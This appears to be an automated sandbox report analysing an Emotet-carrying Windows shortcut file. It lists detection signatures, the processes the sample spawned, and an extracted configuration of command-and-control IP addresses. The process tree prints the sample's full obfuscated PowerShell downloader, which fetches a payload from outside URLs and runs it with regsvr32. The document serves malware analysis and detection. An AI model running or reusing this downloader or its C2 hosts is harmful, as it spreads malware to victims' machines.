Edit tour
Windows
Analysis Report
2022-04-26_1045.exe.lnk
Overview
General Information
Detection
Emotet
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Windows shortcut file (LNK) starts blacklisted processes
Yara detected Emotet
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Sigma detected: BlueMashroom DLL Load
Multi AV Scanner detection for domain / URL
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: Regsvr32 Anomaly
Bypasses PowerShell execution policy
Changes security center settings (notifications, updates, antivirus, firewall)
Suspicious powershell command line found
Machine Learning detection for sample
Powershell drops PE file
Sigma detected: Regsvr32 Network Activity
Sigma detected: Regsvr32 Command Line Without DLL
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
AV process strings found (often used to terminate AV products)
PE file contains an invalid checksum
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Detected TCP or UDP traffic on non-standard ports
Connects to several IPs in different countries
Potential key logger detected (key state polling based)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Sigma detected: Change PowerShell Policies to an Unsecure Level
Queries disk information (often used to detect virtual machines)
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Classification
- System is w10x64
- powershell.exe (PID: 6424 cmdline:
C:\Windows \System32\ WindowsPow erShell\v1 .0\powersh ell.exe" - command Ou t-String - InputObjec t "2022-04 -26_1045.l nk " | Out-N ull; [Syst em.Text.En coding]::A SCII.GetSt ring([Syst em.Convert ]::FromBas e64String( 'JFByb2dyZ XNzUHJlZmV yZW5jZT0iU 2lsZW50bHl Db250aW51Z SI7JGxpbmt zPSgiaHR0c DovL2ZvY3V zbWVkaWNhL mluL2ZtbGl iL0l4QkFCT WgwSTJjTE0 zcXExR1Z2L yIsImh0dHA 6Ly9kZW1vM zQuY2tnLmh rL3NlcnZpY 2UvaGhNWnJ mQzdNbm05S kQvIiwiaHR 0cDovL2Nvb GVnaW91bmF tdW5vLmVzL 2NnaS1iaW4 vRS8iLCJod HRwOi8vY2l wcm8ubXgvc HJlbnNhL3N pWlA2OXJCR m1pYkR2dVR QMUwvIiwia HR0cDovL2Z pbG1tb2d6a XZvdGEucnM vU3ByeUFzc 2V0cy9nRFI vIiwiaHR0c HM6Ly9jcmV lbW8ucGwvd 3AtYWRtaW4 vWktTMURjZ HF1VVQ0QmI 4S2IvIik7Z m9yZWFjaCA oJHUgaW4gJ GxpbmtzKSB 7dHJ5IHtJV 1IgJHUgLU9 1dEZpbGUgJ GVudjpURU1 QL0dNT1dEV FJmSUoueHR xO1JlZ3N2c jMyLmV4ZSA kZW52OlRFT VAvR01PV0R UUmZJSi54d HE7YnJlYWt 9IGNhdGNoI HsgfX0=')) > "C:\Use rs\user\Ap pData\Loca l\Temp\ezM gZunnfF.ps 1" ; power shell -exe cutionpoli cy bypass -file "C:\ Users\user \AppData\L ocal\Temp\ ezMgZunnfF .ps1"; Rem ove-Item " C:\Users\u ser\AppDat a\Local\Te mp\ezMgZun nfF.ps1 MD5: 95000560239032BC68B4C2FDFCDEF913) - conhost.exe (PID: 6432 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - powershell.exe (PID: 6624 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -execution policy byp ass -file C:\Users\u ser\AppDat a\Local\Te mp\ezMgZun nfF.ps1 MD5: 95000560239032BC68B4C2FDFCDEF913) - regsvr32.exe (PID: 6932 cmdline:
"C:\Window s\system32 \regsvr32. exe" C:\Us ers\user\A ppData\Loc al\Temp/GM OWDTRfIJ.x tq MD5: D78B75FC68247E8A63ACBA846182740E) - regsvr32.exe (PID: 7132 cmdline:
C:\Windows \system32\ regsvr32.e xe "C:\Win dows\syste m32\Atpvfj zdexae\enx ldhj.oxc" MD5: D78B75FC68247E8A63ACBA846182740E)
- svchost.exe (PID: 7060 cmdline:
C:\Windows \System32\ svchost.ex e -k Local SystemNetw orkRestric ted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)
- svchost.exe (PID: 7148 cmdline:
c:\windows \system32\ svchost.ex e -k local service -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
- svchost.exe (PID: 908 cmdline:
c:\windows \system32\ svchost.ex e -k netwo rkservice -p -s DoSv c MD5: 32569E403279B3FD2EDB7EBD036273FA)
- svchost.exe (PID: 5712 cmdline:
C:\Windows \System32\ svchost.ex e -k Netwo rkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
- SgrmBroker.exe (PID: 5516 cmdline:
C:\Windows \system32\ SgrmBroker .exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
- svchost.exe (PID: 5816 cmdline:
c:\windows \system32\ svchost.ex e -k local servicenet workrestri cted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA) - MpCmdRun.exe (PID: 6920 cmdline:
"C:\Progra m Files\Wi ndows Defe nder\mpcmd run.exe" - wdenable MD5: A267555174BFA53844371226F482B86B) - conhost.exe (PID: 3368 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- svchost.exe (PID: 5672 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
- svchost.exe (PID: 6916 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
- svchost.exe (PID: 4756 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
- svchost.exe (PID: 6636 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
- svchost.exe (PID: 3420 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
- cleanup
{"C2 list": ["138.201.142.73:8080", "138.197.147.101:443", "134.195.212.50:7080", "104.168.154.79:8080", "149.56.131.28:8080", "129.232.188.93:443", "212.24.98.99:8080", "119.193.124.41:7080", "45.118.115.99:8080", "188.44.20.25:443", "103.132.242.26:8080", "201.94.166.162:443", "1.234.21.73:7080", "206.189.28.199:8080", "185.8.212.130:7080", "82.165.152.127:8080", "176.104.106.96:8080", "173.212.193.249:8080", "167.99.115.35:8080", "209.126.98.206:8080", "185.157.82.211:8080", "212.237.17.99:8080", "185.4.135.165:8080", "51.91.7.5:8080", "187.84.80.182:443", "164.68.99.3:8080", "107.182.225.142:8080", "58.227.42.236:80", "103.75.201.2:443", "101.50.0.91:8080", "216.158.226.206:443", "151.106.112.196:8080", "45.235.8.30:8080", "146.59.226.45:443", "45.176.232.124:443", "134.122.66.193:8080", "51.254.140.238:7080", "131.100.24.231:80", "167.172.253.162:8080", "50.30.40.196:8080", "203.114.109.124:443", "94.23.45.86:4143", "189.126.111.200:7080", "160.16.142.56:8080", "27.54.89.58:8080", "5.9.116.246:8080", "46.55.222.11:443", "209.97.163.214:443", "110.232.117.186:8080", "1.234.2.232:8080", "153.126.146.25:7080", "183.111.227.137:8080", "196.218.30.83:443", "103.70.28.102:8080", "51.91.76.89:8080", "91.207.28.33:8080", "72.15.201.15:8080", "103.43.46.182:443", "209.250.246.206:443", "197.242.150.244:8080", "159.65.88.10:8080", "172.104.251.154:8080", "158.69.222.101:443"], "Public Key": ["RUNLMSAAAADzozW1Di4r9DVWzQpMKT588RDdy7BPILP6AiDOTLYMHkSWvrQO5slbmr1OvZ2Pz+AQWzRMggQmAtO6rPH7nyx2", "RUNTMSAAAABAX3S2xNjcDD0fBno33Ln5t71eii+mofIPoXkNFOX1MeiwCh48iz97kB0mJjGGZXwardnDXKxI8GCHGNl0PFj5"]}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security | ||
JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security | ||
JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security | ||
JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security | ||
PowerShell_Susp_Parameter_Combo | Detects PowerShell invocation with suspicious parameters | Florian Roth |
| |
Click to see the 2 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security | ||
JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security | ||
JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security | ||
JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security |
System Summary |
---|
Source: | Author: Florian Roth, Tim Shelton: |
Source: | Author: Florian Roth, Max Altgelt: |
Source: | Author: Florian Roth, oscd.community: |
Source: | Author: Dmitriy Lifanov, oscd.community: |
Source: | Author: Florian Roth: |
Source: | Author: frack113: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Source: | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): |
Source: | Author: frack113: |
Timestamp: | 04/26/22-09:46:56.833835 04/26/22-09:46:56.833835 |
SID: | 2404310 |
Source Port: | 49756 |
Destination Port: | 8080 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Click to jump to signature section
Show All Signature Results
AV Detection |
---|
Source: | Malware Configuration Extractor: |
Source: | Virustotal: | Perma Link |
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: |
Source: | Virustotal: | Perma Link |
Source: | Joe Sandbox ML: |
Source: | Joe Sandbox ML: |
Source: | Code function: | 8_2_02CE8CAC |
Networking |
---|
Source: | Snort IDS: |
Source: | Network Connect: | Jump to behavior |
Source: | IPs: | ||
Source: | IPs: | ||
Source: | IPs: | ||
Source: | IPs: | ||
Source: | IPs: | ||
Source: | IPs: | ||
Source: | IPs: | ||
Source: | IPs: | ||
Source: | IPs: | ||
Source: | IPs: | ||
Source: | IPs: | ||
Source: | IPs: | ||
Source: | IPs: | ||
Source: | IPs: | ||
Source: | IPs: | ||
Source: | IPs: | ||
Source: | IPs: | ||
Source: | IPs: | ||
Source: | IPs: | ||
Source: | IPs: | ||
Source: | IPs: | ||
Source: | IPs: | ||
Source: | IPs: | ||
Source: | IPs: | ||
Source: | IPs: | ||
Source: | IPs: | ||
Source: | IPs: | ||
Source: | IPs: | ||
Source: | IPs: | ||
Source: | IPs: | ||
Source: | IPs: | ||
Source: | IPs: | ||
Source: | IPs: | ||
Source: | IPs: | ||
Source: | IPs: | ||
Source: | IPs: | ||
Source: | IPs: | ||
Source: | IPs: | ||
Source: | IPs: | ||
Source: | IPs: | ||
Source: | IPs: | ||
Source: | IPs: | ||
Source: | IPs: | ||
Source: | IPs: | ||
Source: | IPs: | ||
Source: | IPs: | ||
Source: | IPs: | ||
Source: | IPs: | ||
Source: | IPs: | ||
Source: | IPs: | ||
Source: | IPs: | ||
Source: | IPs: | ||
Source: | IPs: | ||
Source: | IPs: | ||
Source: | IPs: | ||
Source: | IPs: | ||
Source: | IPs: | ||
Source: | IPs: | ||
Source: | IPs: | ||
Source: | IPs: | ||
Source: | IPs: | ||
Source: | IPs: | ||
Source: | IPs: |
Source: | ASN Name: | ||
Source: | ASN Name: |
Source: | IP Address: | ||
Source: | IP Address: |
Source: | HTTP traffic detected: |